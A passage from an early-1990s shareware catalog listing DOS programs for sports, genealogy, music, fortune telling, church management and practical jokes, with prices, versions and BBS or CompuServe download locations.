+ Product: PCCLOCK + Digital clock plus timesetting by modem. See full description + on page 88. + + Chapter 15, "Home & hobby" 371 + + + + Product: WHATS-UP + Needs: IBM PC, DOS 2.0 or better. Radio receiver and Radio + Modem. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $35.00 + Registration benefits: upgrades, support (elcetronic, telephone + and mail). Data exchange. + Version: 1.00 (04-01-91) + User benefits: upgrades, support (elcetronic, telephone and + mail). Data exchange. + Look for: PC HAM on BBSs (call 301-593 9067 to download it at no + charge). + Download size: 202k + Description: + A tool which provides the Radio Amateur, or the Educator, with + the capability to perform experiments in spacecraft orbital + dynamics as well as monitoring the environment onboard several + of the Orbiting Satellites Carrying Amateur Radio (OSCAR) + during individual passes or over long periods of time. Provides + an introduction as to how this can be done using readily + available low cost equipment (under $500.00). + + + 15.10 Sports + + Product: 3 ball Juggler + Juggling tutor and arcade-game like simulator. See full + description on page 405. + + Product: Diamond Data [***] + Needs: IBM PC, DOS 2.1 or better. + Author: The Software Construction Co. + Registration: $25.00 + Registration benefits: Printed manual, master disks. + Version: 4.0 (04-01-92) + User benefits: Printed manual, master disks. + Look for: DDATA40.ZIP on BBSs (call 508-454-3864 to download it + at no charge); DDATA.ZIP in IBMNEW forum LIB 9 on CompuServe. + Download size: 115k + Description: + Manipulate data for your league or team. 34 different + statistics are kept for each player. 9 more for each game + played. Databases can be merged to allow league totals, + lifetime stats, season totals, etc. depending on what info. is + stored in each DB. Great for helping generate that batting + order or awards for your team/league banquet! + + A report generation facility allows sorting and filtering + (exclude players below a threshold) by any statistic and can + output to a file, disk, or printer. + + Chapter 15, "Home & hobby" 372 + + + + Product: FISHBYTE(tm) + Needs: IBM PC, DOS 3.3 or better. Hard disk, CGA monitor. + Author: EJM Computer Consulting Ltd., 516-483-7561 + Registration: $29.95 + Registration benefits: Printed manual, master disks, phone + support. + Version: 1.2 (01-07-92) + User benefits: Printed manual, master disks, phone support. + Look for: FISHBYTE.ZIP on BBSs (call 516-226-3727 to download it + at no charge); FISHBY.ZIP in OUTDOORS forum LIB 5 on + CompuServe. + Download size: 218k + Description: + This integrated fishing and Loran log program is specifically + designed for the salt water angler. This menu driven system + consists of three components. The fishing trip log provides a + fun and easy way to record all the important aspects of a day's + fishing. The Loran log can be used to organize your valuable + collection of Loran coordinates. The Utilities area includes a + moon phase display, a "Personal Best" search, and "Techniques" + where notes on various methods can be stored. + + Product: LEANER + Weight Control Charting & Motivation Program. See full + description on page 224. + + Product: ORGANIZE! Your Guns + Cataloging systems for guns. See full description on page 356. + + Product: ORGANIZE! Your Sports Cards + Cataloging system for sports cards. See full description on + page 357. + + Product: Personal Golf Tracker + Needs: IBM PC, DOS 2.1 or better. + Author: John L. Hancock + Registration: $15.00 + Registration benefits: Latest version, after hours phone support, + and a printed manual for registered users. + Version: 2.1 (07-15-91) + User benefits: Latest version, after hours phone support, and a + printed manual for registered users. + Look for: availability unknown on BBSs; PGT21.ZIP in IBMNEW forum + LIB 9 on CompuServe; PGT21.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 120k + Description: + Keeps track of your golf scores and much more. It displays + your personal best on each course you play on a hole by hole + basis, keeps your average scores on par 3's par 4's and par 5's + as well as your averages for each nine and eighteen. Shows the + distribution of your scores to par, bogey, etc. Calculates nine + and eighteen hole handicaps and prints seven summaries of your + performance. Also lets you track of six statistics of your + choosing. Also useful for leagues. + + Chapter 15, "Home & hobby" 373 + + + + Product: The Pool Manager + Needs: IBM PC, DOS 2.1 or better. + Author: American Systems + Registration: $25.00 + Registration benefits: 1) Current season NFL Schedule on disk 2) + Technical support via mail or Compuserve 3) SQRPOOL utility + program for running playoff pools 4) Latest version of the + program and discounted upgrades. + Version: 2.0 (08-05-90) + User benefits: 1) Current season NFL Schedule on disk 2) + Technical support via mail or Compuserve 3) SQRPOOL utility + program for running playoff pools 4) Latest version of the + program and discounted upgrades. + Look for: availability unknown on BBSs; NFL.EXE in IBMNEW forum + LIB 9 on CompuServe. + Download size: 130k + Description: + Maintains all aspects of running a football pool or a pool for + any sport. 6 different customizable reports including + picksheet, standings, `What If?' scenarios, & everyone's picks. + You can configure the exact pool you want using the following + options: + + 1) Confidence Points or Wins & Losses only + + 2) Use of a custom tiebreaker + + 3) Application of the pointspread + + Keeps season long statistics for a group of up to 120 + participants. An NFL schedule is available, but not required. + Fully menu driven. + + Product: SOFF BALLS + Needs: IBM PC, DOS 2.1 or better. + Author: Computater Software, 608-271-1586 + Registration: $29.00 + Registration benefits: Will receive FREE Version 4.0 ; phone + support; mailed notification when major upgrades become + available! + Version: 3.2 (11-28-91) + User benefits: Will receive FREE Version 4.0 ; phone support; + mailed notification when major upgrades become available! + Look for: SB32.ZIP on BBSs (call 608-849-5842 to download it at + no charge); SB32.ZIP in IBMNEW forum LIB 9 on CompuServe. + Download size: 143k + Description: + Softball/Baseball record-keeping system for league or + individual teams. Keeps records for up to 20 teams. Reports + on team records, game scores, batting and pitching statistics, + and team standings. Computes statistics for selected games + (all games, first 7 league games, last 15 tournament games, + games 5 through 9, etc.). Displays and prints reports. Menu- + driven and very easy to use. + + Chapter 15, "Home & hobby" 374 + + + + Product: SwimBase + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Words to Go, 301-855-6427 + Registration: $49.00 + Registration benefits: Printed manual, master disks. + Version: 1.60 (03-01-92) + User benefits: Printed manual, master disks. + Look for: SWIMDB16.ZIP on BBSs; SWIMDB.ZIP in IBMNEW forum LIB 9 + on CompuServe. + Download size: 198k + Description: + An easy to use, menu driven program to keep all the data + required for a swim team. The swimmers' personal data is stored + along with all event, meet and season results. Team rosters, + address lists, swimmer results, event results and meet results + are some of the reports that can be prepared. All event names, + event numbers and event scoring is user-definable. User + selectable age and event groups are available. Supports up to + 511 swimmers per team and 256 events. + + + 15.11 Genealogy + + Product: Brother's Keeper + Needs: IBM PC, DOS 3.1 or better. 512k RAM, hard disk. + Author: John Steed + Registration: $45.00 + Registration benefits: Printed manual; master disks; support. + Version: 5.0 (01-01-92) + User benefits: Printed manual; master disks; support. + Look for: BK5*.* (multiple files) on BBSs (call 616-364-1127 to + download it at no charge); BK5*.* in ROOTS forum LIB 3 + (multiple files) on CompuServe; BK5*.* in GENEALOGY RTC LIB 8 + (multiple files) on GEnie. + Download size: 990k + Description: + This featured genealogy program can store names, dates, + locations, and other information for up to 1,000,000 people. It + prints all the standard charts and reports and a few unique + ones. Reports include ancestor or pedigree charts, descendant + reports with relationships, graphic descendant tree, family + group sheets, alphabetical name lists, birthday lists, custom + designed reports, ahnentafel lists, graphic box charts, and a + descendant register report. Includes gedcom. + + Product: CHRONOS + Interactive historical timelines. See full description on + page 327. + + Chapter 15, "Home & hobby" 375 + + + + Product: Family Tree Print Utility + Needs: IBM PC, DOS 2.1 or better. 384k RAM. Hard Disk and 640K + RAM recommended. + Author: Common Sense Software, 513-231-0730 + Registration: $25.00 + Registration benefits: Phone/CIS/Mail support, printed manual, + latest version, newsletter, laser printing service for charts. + Version: C (03-01-91) + User benefits: Phone/CIS/Mail support, printed manual, latest + version, newsletter, laser printing service for charts. + Look for: availability unknown on BBSs; FTP*.ZIP in ROOTS forum + LIB 8 on CompuServe. + Download size: 180k + Description: + Prints family history charts using databases created by PAF, + Family Ties or GEDCOM files. FTP prints Three Generation Charts + (like linked Family Group Sheets) and Wall Charts of ancestors, + descendants or all people. An alphabetized index can be printed + for each chart. Supports all printers (including PostScript) + and features an LDS Church-certified GEDCOM export capability + (Fam Ties vers). Includes a "tree pruning" feature to omit + family lines from the charts. Laser printing service available. + + + 15.12 Music + + Product: ACCU Music Printer + Needs: IBM PC, DOS 3.0 or better. Text editor or word processor + needed to enter music. + Author: Kevin Fischer, 619-487-5461 + Registration: $5.00 + Registration benefits: Receive next version on disk with printed + documentation; Support for registered/non-registered users; + Other registration plans available. + Version: 2.1 (03-23-91) + User benefits: Receive next version on disk with printed + documentation; Support for registered/non-registered users; + Other registration plans available. + Look for: AC21MUSC.ZIP on BBSs (call 619-566-1745 to download it + at no charge). + Download size: 100k + Description: + Allows the user to create their own sheet music. Musical notes + are entered via a user supplied text editor. The program then + will print this music out on the printer in traditional sheet + music format. The program supports Treble, Bass, Tenor, Alto, + and Soprano clefs. It has three modes of print quality for + normal printers and one mode for laser printers. A program to + transpose your music is also included. It can transpose by + half steps, change the key signature, etc. + + Product: ALBUM KEEPER II + CD, Album Organizer. See full description on page 348. + + Chapter 15, "Home & hobby" 376 + + + + Product: AlbumMaster + Easily catalog your album collection. See full description on + page 349. + + Product: CassetteMaster + The best way to catalog your cassettes! See full description + on page 350. + + Product: CDMaster + Helping You To *Master Your CD Collection. See full + description on page 350. + + Product: Melissa's Music Flashcards + Needs: IBM PC, DOS 3.3 or better. EGA monitor, Microsoft mouse. + Author: Fischer Grafix & Software + Registration: $20.00 + Registration benefits: Master disks, phone support. + Version: 2.0 (01-30-92) + User benefits: Master disks, phone support. + Look for: FMSMMF.ZIP on BBSs; FMSMMF.ZIP in IBMAPP forum LIB 11 + on CompuServe. + Download size: 60k + Description: + Kids of all ages can learn to read music. You can set the type + of note that appears on the screen from flats to sharps. The + program will acknowledge if your choice is correct by smiling + at you or if your selection was wrong it will cry. The program + was written to add some fun to the drudgery of trying to learn + music. The program also includes a hint feature which shows the + correct key on the piano keyboard. + + Product: MuziTrak System + Needs: IBM PC, DOS 2.1 or better. Hard disk, 512k RAM. + Author: Blam Entertainment Group, 613-831-4064 + Registration: $20.00 + Registration benefits: Serial Number, New Version Notification, + Free Upgrades. + Version: 1.11 (10-08-91) + User benefits: Serial Number, New Version Notification, Free + Upgrades. + Look for: MT-111.ZIP on BBSs. + Download size: 150k + Description: + Compact Disc Cataloging Program. Easy to use, menu driven. + Search for any song title on any disc. Capable of tracking up + to 99 song titles per disc and their run times. Track artist, + title, recording label, year of release, distributor and + running time. Also presence of CD+Graphics, CD-Video, CD3, + AAD, DDD, etc. Fully configurable printer support for any + printer. Database archive support included. + + Product: ORGANIZE! Jazz Collection + Cataloging system specifically for jazz. See full description + on page 352. + + Chapter 15, "Home & hobby" 377 + + + + Product: ORGANIZE! Your CDs & Records + Cataloging system for CDs, LPs and tapes. See full description + on page 354. + + Product: PIANOMAN + Needs: IBM PC, DOS 2.0 or better. 160k RAM. + Author: Neil J. Rubenking + Registration: $25.00 + Registration benefits: Disk with example tunes. + Version: 4.01 (02-08-89) + User benefits: Disk with example tunes. + Look for: availability unknown on BBSs; PMAN40.ARC in + ZNT:AFTERHOURS forum LIB 11 on CompuServe. + Download size: 130k + Description: + Turn your PC keyboard into an electronic piano! Play tunes on + the keyboard, then edit easily, with all commands available by + a single keystroke. Record 2-4 voices and merge them to get a + tune with harmony. Compile tunes to stand-alone programs that + now auto-synch themselves with processor speed. Play short + tunes in the background using Cove Software's SPKR.SYS. Many + example tunes available, created by the author and by third + parties. + + Product: SoundZ [***] + The ULTIMATE Music Librarian. See full description on + page 358. + + Product: ZideCar [***] + Home recorder utility for SoundZ. See full description on + page 359. + + + 15.13 Fortune telling & astrology + + See also: Religion & philosophy (page 386). + + Product: Book of Changes + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 1.61 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: BOOK*.ZIP on BBSs; BOOK*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + The I Ching is an ancient Chinese book used for both fortune + telling and philosophical insight. Toss coins or sticks to + create a pattern of 6 lines, forming a hexagram for + + Chapter 15, "Home & hobby" 378 + + + + interpretation. Completely menu-driven, so you never enter long + command sequences. You can edit the text for each hexagram and + add your own comments. Readings can be saved, edited, printed. + + Product: By the Numbers + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, free mail support, CIS + support, 900-number phone support, upgrade notices. + Version: 4.52 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: NUMB*.ZIP on BBSs; NUMB*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Use the philosophy of Numerology to analyze your name & + birthdate for their symbolic meaning and metaphysical + vibrations, giving a complete personality profile. Uses + Pythagorean system, takes name changes into account, analyzes + 10 personality elements, provides forecast. Readings can be + saved, edited, printed. + + Product: Crystal Ball + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $19.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, newsletter, + upgrade notices. + Version: 3.11 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, newsletter, upgrade + notices. + Look for: CRYS*.ZIP on BBSs; CRYS*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + Welcome to the world of the psychic computer! This tongue-in- + cheek program makes predictions and answers questions with a + sometimes enigmatic style reminiscent of the ancient Greek + oracles. You select the subject matter for predictions of + personal interest. This could explain where those crazy tabloid + headlines come from! + + Chapter 15, "Home & hobby" 379 + + + + Product: Fortune Teller + Needs: IBM PC, DOS 2.0 or better. 400K RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 3.51 (08-15-91) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: FORT*.ZIP on BBSs; FORT*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + A potpourri of fortune telling techniques includes three + separate playing card methods, dice, short Numerology reading, + and Runes. A history and explanation of each method appears in + the documentation. Also included is an ESP test. + + Product: Geomancy + Ancient system of divination with black magic. See full + description on page 388. + + Product: Mayan Calendar + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, free mail support, CIS + support, 900-number phone support, upgrade notices. + Version: 3.51 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: MAYAN*.ZIP on BBSs; MAYA*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Uses the astronomical knowledge of the ancient Mayans to + convert a modern calendar date to its Mayan equivalent, and + then gives the Mayan astrological interpretation. Also uses + Julian period dates and will calculate from Mayan to modern + date. Has chart of Mayan and Aztec day and month names. Easy- + to-understand documentation and history of the Mayan calendar + included on disk. Norman Donaldson's excellent research is + explained in detail. + + Chapter 15, "Home & hobby" 380 + + + + Product: Personal Tarot + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Printed manual, latest version, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 2.52 (03-01-92) + User benefits: Printed manual, latest version, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: TAROT*.ZIP on BBSs; TARO*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + Tarot cards have been used around the world throughout history + for fun and fortune. Now you can enjoy professional quality + Tarot readings on your PC! Personal Tarot automates shuffling + and dealing, builds a 10-card layout, and displays card + descriptions and meanings. You choose from different methods of + shuffling and layout. You can edit card interpretations and add + your own comments. Readings can be saved, edited, printed. No + graphics. + + Product: Richard Webster Programs + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, free mail support, CIS + support, 900-number phone support, upgrade notices. + Version: 2.1 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: WEBSTER.ZIP on BBSs; AURA*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Based on the work and research of internationally-known psychic + entertainer Richard Webster, "Aura Reading" helps you learn + what to look for when attempting to see the human aura. "Quick + Numerology" uses a special method of Numerology, popular in + Australia and New Zealand, to give a quick but pointed + personality profile. It's a great way to meet people and make + friends! + + Chapter 15, "Home & hobby" 381 + + + + Product: Your ESP Test + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: R.K. West Consulting + Registration: $0.00 + Registration benefits: Free mail support, optional 900# phone + support. + Version: 1.1 (01-01-92) + User benefits: Free mail support, optional 900# phone support. + Look for: ESP*.ZIP on BBSs; ESP*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Three standard tests to see if you have ESP (extra-sensory + perception) potential. Try precognition, clairvoyance, or + telekinesis. Lots of fun! + + + 15.14 Planes, trains & automobiles + + Product: Chris's Automobile Recorder [***] + Needs: IBM PC, DOS 3.3 or better. 300k RAM. At least one drive + with a capacity greater than 360k. Strongly recommended: hard + disk, 80286 computer, CGA monitor. + Author: Cooney Applied Technology + Registration: $0.00 + Registration benefits: Program Setup & Problem Support by mail. + Version: 12.2A (03-28-91) + User benefits: Program Setup & Problem Support by mail. + Look for: CAR122.ZIP on BBSs (call 513-274-0821 to download it at + no charge); CAR122.EXE in IBMAPP forum LIB 7 on CompuServe. + Download size: 188k + Description: + Keeps a log of a vehicle's or machine's operation. It + independently tracks when each maintenance item or inspection + is due. Full statistics display. Quick, powerful, & easy to + use, comprehensive, and has pop-up context-sensitive help and a + 28 p. manual. It will help you operate your vehicles or + machines reliably and economically. The detailed, printed log + adds value to your vehicle at resale time. "Scan" mode can + remind of any maintenance due when you start your computer. + + Chapter 15, "Home & hobby" 382 + + + + 15.15 Other + + Product: Bannerific + Needs: IBM PC, DOS 2.0 or better. + Author: TexaSoft, 214-291-2115 + Registration: $15.00 + Registration benefits: User registration, latest version, bonus + programs included. + Version: 1.1 (01-01-91) + User benefits: User registration, latest version, bonus programs + included. + Look for: BANNER.ZIP on BBSs; BANNER.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 80k + Description: + Prints Vertical or Horzontal banners on any printer. + + Product: C.A.R.S. + The Complete Automobile Reporting System. See full description + on page 191. + + Product: Creativity Package + Become more creative. See full description on page 142. + + Product: Home Helper + Various useful routines for the home. See full description on + page 92. + + Product: THE INTERSTATE TRAVELER [***] + Needs: IBM PC, DOS 3.3 or better. 512k RAM, EG monitor, hard + disk, floppy drive. + Author: David E. Jacobson, 918-333-7563 + Registration: $29.00 + Registration benefits: Master disks, one free upgrade, six months + phone/mail support, bonus utilities. + Version: 1.1 (04-06-92) + User benefits: Master disks, one free upgrade, six months phone/ + mail support, bonus utilities. + Look for: availability unknown on BBSs. + Download size: 424k + Description: + Save time and money, plan your motor trips across the U.S. Each + day, you will select an origin city, each city and highway + junction along the way, and a destination. Include stops for + food, gas, rest, visits, and overnight stays. Produce a daily + itinerary and estimate of expenses. Display maps of forty + major US cities, including highways, points of interest, + population and weather information. + + Chapter 15, "Home & hobby" 383 + + + + Product: ORGANIZE! Your Fabrics + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + master disks, newsletter support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: FABRC527.ZIP on BBSs. + Download size: 300k + Description: + For people who sew this is the program that will help you keep + your fabrics and notions organized. Each fabric can be + organized using up to 21 criteria such as fabric type, color, + pattern, intended use when purchased, amount available and + more. All information you enter can be searched, cross + referenced and alphabetized. This software allows you to + quickly find what you need or to determine that you don't have + what you are looking for. Published by HomeCraft, the leader + in cataloging software. + + Product: ORGANIZE! Your Home + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + updates, newsletter support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, updates, + newsletter support, bonus utilities. + Look for: HOME527.ZIP on BBSs. + Download size: 300k + Description: + A home and office inventory system that is great for insurance + records or for just help you keep track of what you own and + where it is located. Each item can be catorgized using up to + 21 lines of information plus a full screen free-form note pad. + A 10,000,000 entry capacity can handle the largest inventory. + + 3-D drop down menus put all of the features at your finger + tips. User definable reports print anything from labels to + full page reports. Search for, cross reference or alphabetize + any line. + + Chapter 15, "Home & hobby" 384 + + + + Product: Peronal Record Keeper + Needs: IBM PC, DOS 3.0 or better. Hard disk and CGA monitor + strongly recommended. + Author: Professional Automated Systems, 609-448-9299 + Registration: $49.75 + Registration benefits: Support from authors (other than + installation help); discounts on future versions. + Version: 1.1 (09-01-90) + User benefits: Support from authors (other than installation + help); discounts on future versions. + Look for: availability unknown on BBSs; PRK.EXE in IBMAPPS forum + LIB 7 on CompuServe. + Download size: 278k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows you to store information in 14 different categories, + including home inventory, valuables, important documents, + medical data, family dates, entertainment catalog, tax data, + loan information, credit cards, tradespeople, etc. Each + category has an associated report. Full context-sensitive help, + very easy to use. Complete documentation is included on the + distribution diskette. + + Product: Poetry Star [***] + AI poetry writing for entertainment, educ. See full + description on page 423. + + Product: Quilt + Create intriguing patterns/scrn saver option. See full + description on page 346. + + Product: STS26 + Space Shuttle Tracker. See full description on page 311. + + Product: UDECIDE + Decision analysis and what-if tool. See full description on + page 218. + + Product: WORLD29 + Global Mapping/tracking Geography. See full description on + page 330. + + Chapter 15, "Home & hobby" 385 + + + + Product: Your Numerologist + Needs: IBM PC, DOS 3.0 or better. + Author: Unique Software + Registration: $18.95 + Registration benefits: Reduced rate upgrades; notification of + major upgrades; tech support by Fax and/or CompuServe Mail. + Version: 1.03 (02-13-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: URNMBR.EXE on BBSs; URNMBR.EXE in IBMNEW forum LIB 6 on + CompuServe. + Download size: 78k + Description: + Provides you with a personalize "day at a glance" calendar + providing you with all the numerological data you need for each + day. And there's no need to wander through pages of + documentation, tables of content, and indexes to interpret your + numbers. Each calendar provides you with your + * personal year number + * yearly guideline + * personal month number + * guideline for month + * personal day number + * daily focus + + Chapter 16, "Religion & philosophy" 386 + + + + + + Chapter 16 + Religion & philosophy + + See also: Home & hobby, Fortune telling & astrology (page 377). + + + 16.1 The Bible + + 16.1.1 Bible programs + + Product: SeedMaster + Needs: IBM PC, DOS 2.1 or better. Hard disk, 512k RAM. + Author: White Harvest Software, Inc., 919-870-0775 + Registration: $30.00 + Registration benefits: Latest program version, notification of + updates/enhancements, printed manual, BBS and Voice Mail + Support. + Version: 2.1 (11-01-90) + User benefits: Latest program version, notification of updates/ + enhancements, printed manual, BBS and Voice Mail Support. + Look for: SMDEMO.LZH on BBSs (call 919-846-2141 to download it at + no charge). + Download size: 235k + Description: + KJV Bible/Concordance. Copyrighted Bible texts avail from + author (NIV, RSV, Spanish, Greek NT). Up to 3 Bible texts side + by side. Interlinear option. Fast browsing. Bible books + selected by menu. Exhaustive word list. Searches can test word + order and case. * wildcard. Search words highlighted on screen/ + printer. Store and merge searches (OR, AND, XOR, NOT). Search + statistics. Commentary lets you enter comments verse by verse. + Notepad. Grabber copies window text. Uses many CUA windowing + standards. + + 16.1.2 Bible text + + Product: SeedMaster + Bible Study/Concordance Program. See full description on + page 386. + + + 16.2 Software for houses of worship + + See also: Database applications (page 150). + + Chapter 16, "Religion & philosophy" 387 + + + + Product: Church Membership Tracking Sys + Needs: IBM PC, DOS 3.0 or better. Hard Disk. + Author: Torbert Data Systems, INC., 804-488-5506 + Registration: $295.00 + Registration benefits: Attractive 3 Ring manual, support BBS, + telephone support. + Version: 3.0 (07-06-91) + User benefits: Attractive 3 Ring manual, support BBS, telephone + support. + Look for: TDS BBS on BBSs (call 804-488-4146 to download it at no + charge); CMTS3*.ZIP in IBMAPP forum LIB 9 (multiple files) on + CompuServe; CMTS3*.ZIP in IBMPC RTC LIB 3 (multiple files) on + GEnie. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + An exceptionally easy to use, full featured church management + system. Modules for membership, donations, attendance, + visitation and a powerful fund accounting general ledger system + are included. Maintains all membership and financial + information of a church, either large or small. This is also + an excellent program for other non-profit organizations. The + program is well supported by the author and frequently updated. + + Product: ORGANIZE! Your Books/Magazines + Cataloging system for books & magazines. See full description + on page 354. + + Product: ORGANIZE! Your CDs & Records + Cataloging system for CDs, LPs and tapes. See full description + on page 354. + + Product: ProDev*MEMBER [***] + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Author: Pro Dev Software, 616-788-2243 + Registration: $55.00 + Registration benefits: Printed manual, one year of support. + Version: 2.0 (04-15-92) + User benefits: Printed manual, one year of support. + Look for: availability unknown on BBSs; PDMEM?.EXE in IBMAPP + forum LIB 9 (multiple files) on CompuServe. + Download size: 287k + Description: + Tracks address, children, attendance, giving, jobs, talents and + any information for anyone walking in the church door. Allows + fast posting of giving and attendance. Unlimited text notes + window per member with search features. Many reports, + statements, labels and rotary file card runs with very flexible + filtering. F1 Help and very low cost. + + Chapter 16, "Religion & philosophy" 388 + + + + 16.3 New age/occult + + Product: Book of Changes + I CHING fortunes and philosophy. See full description on + page 377. + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 378. + + Product: Fortune Teller + 6 ways to tell fortunes, plus ESP test. See full description + on page 378. + + Product: Geomancy + Needs: IBM PC, DOS 2.0 or better. 600k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 4.04 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: GEO*.ZIP on BBSs; GEO*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + This is an ancient system of divination, sometimes associated + with black magic. Originally based on stones tossed in a + circle, modern Geomancy uses your selection of dot patterns to + create an Astro-Geomantic chart and answer your questions. + Provides an explanation of Geomantic figures. Readings can be + saved, edited, printed. + + Product: Mayan Calendar + Converts Mayan/modern calendar dates. See full description on + page 379. + + Product: Personal Tarot + Fortune telling with Tarot cards. See full description on + page 379. + + Product: Richard Webster Programs + Learn to read auras! See full description on page 380. + + Product: Your ESP Test + Test your ESP potential! See full description on page 380. + + Chapter 16, "Religion & philosophy" 389 + + + + 16.4 Philosophy + + Product: Ethics Awareness + Needs: IBM PC, DOS 3.3 or better. VGA monitor. + Author: Niche Software, 714-892-9052 + Registration: $5.00 + Registration benefits: Mail support. + Version: 1.1 (03-21-92) + User benefits: Mail support. + Look for: ETHIK.ZIP on BBSs (call 714-636-2667 to download it at + no charge). + Download size: 260k + Description: + Did you know that a positive ethical perspective of a company + must be continually articulated? As of 1990, 36% of + organizations with more than 100 employyes provide ethics + training. This PC kit might be used to help individuals handle + tough decisions; to nurture a sense of conscience in the + organization; to use the PC as a host for your unique company + code of ethics. This program explains secular incentives for + doing the right thing. + + 16.4.1 Metaphysics + + Product: Book of Changes + I CHING fortunes and philosophy. See full description on + page 377. + + + 16.5 Software tools + + 16.5.1 For other + + Product: CHRONOS + Interactive historical timelines. See full description on + page 327. + + Chapter 17, "Games" 390 + + + + + + Chapter 17 + Games + + See also: Home & hobby, Lottery (page 367). + + + 17.1 Practical jokes + + Product: Curses! + Creative insult generator. See full description on page 391. + + Product: Hard at Work + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $0.00 + Registration benefits: Free mail support, 900-number phone + support, CIS support. + Version: 1.1 (06-01-91) + User benefits: Free mail support, 900-number phone support, CIS + support. + Look for: HAWHAW.ZIP on BBSs; HAWHAW.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + This cutie ties up your computer with a Very Important (but + imaginary) task so you can take a break. When you start Hard At + Work, it selects one of 7 routines at random. You can pick your + favorite job by pressing the appropriate function key. The + activity on screen looks too important to be interrupted. If + someone tries to stop the action with ESC or CTRL-C, a DANGER + message pops up, and a tone alerts you. The process continues + until you want to stop it. + + Product: LoveDOS + Needs: IBM PC, DOS 2.0 or better. 420k RAM. + Author: R.K. West Consulting + Registration: $0.00 + Registration benefits: Free support, 900-number phone support, + CIS support. + Version: 1.3 (06-01-91) + User benefits: Free support, 900-number phone support, CIS + support. + Look for: LOVEDOS.ZIP on BBSs; LOVE*.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Unlike practical joke programs that take over the DOS prompt + and insult you, this uncooperative program drowns you with love + and affection! It responds intelligently to many DOS commands + and has a repertoire of friendly comments. + + Chapter 17, "Games" 391 + + + + 17.2 Jokes & humor + + Product: Babble! + Creativity tool for writers. See full description on page 142. + + Product: Crystal Ball + Humorous computerized psychic. See full description on + page 378. + + + 17.3 Sayings & stories + + Product: Curses! + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: R.K. West Consulting + Registration: $10.00 + Registration benefits: Latest version, free mail support, CIS + support, 900-number phone support, upgrade notices. + Version: 2.11 (03-01-92) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notices. + Look for: CURSE*.ZIP on BBSs; CURS*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + A humorous, creative "insult generator" with a different twist. + A single keystroke switches from insults to compliments! + Phrases are randomly generated from your vivid vocabulary. You + control the contents, so the program can generate descriptive + phrases on any subject. + + Product: FormGen Utility Pak #1 + Super useful DOS utility kit. See full description on page 24. + + + 17.4 Board games + + 17.4.1 Mahjong + + Product: Mah Jongg--Solitaire + Needs: IBM PC, DOS 2.1 or better. EGA or Hercules monitor. + Author: Arcanum Computing + Registration: $15.00 + Registration benefits: Master disks, utilities, additional tile + sets. + Version: 3.51 (08-09-91) + User 